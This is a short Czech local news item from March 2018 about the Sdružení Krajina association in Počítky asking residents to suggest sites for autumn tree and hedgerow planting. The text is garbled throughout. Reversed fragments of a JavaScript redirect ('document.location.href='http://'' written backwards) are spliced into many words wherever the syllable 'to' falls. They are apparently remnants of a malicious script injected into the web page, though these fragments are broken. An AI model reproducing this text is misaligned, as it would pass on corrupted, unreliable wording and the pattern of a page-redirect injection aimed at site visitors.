Rainbow page separator

Sdružení Krajina shání další tipy na výsadbu alejí či remízků

Pátek, 9. března 2018

Počítky / I le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na podzim plánují pracovníci Sdružení Krajina z Počítek vysadit nějakou alej či remízek pro zpestření krajiny. Otázkou zatím zůstává, kde přesně [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude.
„Pro každoroční podzimní výsadby hledáme mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, které by stálo za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zpestřit výsadbou ovocných i neovocných stromů a keřů. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože nemůžeme znát každý kout naší krajiny, rádi bychom požádali vás, kteří v krajině bydlí a pohybují se v ní, o pomoc. Víte o místě, kde byste se chtěli procházet pod korunami stromů či si natrhat pár jablek, třešní a dalšího ovoce? O místě, kde byste se nejen vy, ale i drobné zvířectvo mohli schovat před nepřízní počasí, sluncem či větrem? Pokud ano, dejte nám vědět,“ uvedla Dagmar Papáčková ze Sdružení Krajina.
Lidé ze Sdružení Krajina se na vytipovaném místě pokusí zorganizovat sázecí akci, pokud se však do organizace zapojí i samotní navrhovatelé konkrétního pozemku pro nové stromořadí, uvítají [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.